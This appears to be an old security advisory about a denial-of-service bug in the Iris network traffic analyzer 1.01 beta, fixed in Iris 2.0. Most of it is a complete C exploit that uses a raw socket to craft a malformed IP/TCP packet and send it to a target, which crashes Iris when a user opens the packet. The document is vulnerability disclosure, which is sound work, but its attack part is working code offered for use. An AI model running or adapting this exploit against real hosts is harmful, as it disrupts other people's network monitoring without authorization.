COMMAND

    Iris

SYSTEMS AFFECTED

    Iris 1.01beta

PROBLEM

    Wouter  ter  Maat  aka  grazer  found  following.   There exists a
    vulnerability that  will cause  the iris  network traffic analyser
    to hang.  Exploit will demonstrate the bug.  The exploit will send
    a packet to the remote host, when the remote host opens the packet
    (to examine it) iris will quit, leaving an error message.

    /* Denial of Service attack against :
     * Iris The Network Traffic Analyzer beta 1.01
     * ------------------------------------------------
     *
     * Will create an incorrect packet which will cause
     * Iris to hang when it is opened by a user.
     *
     * Vulnerability found by : grazer@digit-labs.org
     * Exploit code by : grazer@digit-labs.org
     *
     * Respect to the guys from eEye, for there fast
     * response.
     *
     * greetings to hit2000, hwa, synnergy, security.is
     *              digit-labs.
     *
     * ---------------> free sk8!!!! <-----------------
     *
     * ------------------------------------------------
     * http://www.digit-labs.org
     *                           grazer@digit-labs.org
     * ------------------------------------------------
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/tcp.h>
    #include <sys/types.h>
    #include <sys/socket.h>

    int build_packet(int sfd, u_long srcaddr, u_long dstaddr);

    struct pseudo {
    u_long saddr;
    u_long daddr;
    u_char zero;
    u_char protocol;
    u_short length;
    };

    int main(int argc,char **argv){
    int rawfd, check, one=1;

    struct sockaddr_in raddr;
    struct in_addr source_ip, desti_ip;
    struct ip *ip;
    struct tcphdr *tcp;

            while (argc<3) {
            fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]");
            fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0] );  exit(0);}

            fprintf(stderr, "\nStarting Iris DoS...\n");
            if((check=gethostbyname(argv[2])==NULL)) {
            fprintf(stderr, "\nCannot resolve host %s\n", argv[2]); exit(0); }

	    source_ip.s_addr= inet_addr(argv[1]);
	    desti_ip.s_addr =       inet_addr(argv[2]);

	    if ((rawfd=socket(PF_INET, SOCK_RAW, IPPROTO_TCP))<0) {
	    fprintf(stderr, "\n You need root for this..");
	    exit(0); }

	    setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, 1);

	    build_packet(rawfd,source_ip.s_addr, desti_ip.s_addr);

        close(rawfd);
    return 1; }


    int build_packet(int sfd, u_long srcaddr,  u_long dstaddr) {

    u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
    struct sockaddr_in sin;
    struct in_addr src_inaddr, dest_inaddr;
    struct ip *ip = (struct ip *) packet;
    struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
    struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
    + sizeof(struct pseudo));

	    bzero(packet, sizeof(packet));
	    bzero(&sin,sizeof(sin));

	    src_inaddr.s_addr = srcaddr;
	    dest_inaddr.s_addr = dstaddr;

	    pseudo->saddr = srcaddr;
	    pseudo->daddr = dstaddr;
	    pseudo->zero = 1;
	    pseudo->protocol=IPPROTO_TCP;
	    pseudo->length = htons(sizeof (struct tcphdr));

	    ip->ip_v = -1;
	    ip->ip_hl = -1;
	    ip->ip_id = -1;
	    ip->ip_src = src_inaddr;
	    ip->ip_dst = dest_inaddr;
	    ip->ip_p = IPPROTO_TCP;
	    ip->ip_ttl = 40;
	    ip->ip_off = -1;
	    ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
	    tcp->seq = htonl(rand());
	    tcp->ack = htonl(rand());

	    sin.sin_family=AF_INET;
	    sin.sin_addr.s_addr=dstaddr;
	    sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0,
	    (struct sockaddr *) &sin,sizeof(sin));

            fprintf(stderr, "\n Packet send... \n\n" );

       return 1;}

    The one thing to  note is that someone  has to actually click  and
    view the "evil" packet in order for Iris to crash.  If you  simply
    open  iris  and  start  sniffing  and  receive  the "evil" packet,
    without clicking to view it, then Iris will not crash.

SOLUTION

    This indeed  is a  bug in  Iris 1.01  beta and  it has  been fixed
    within Iris 2. 0.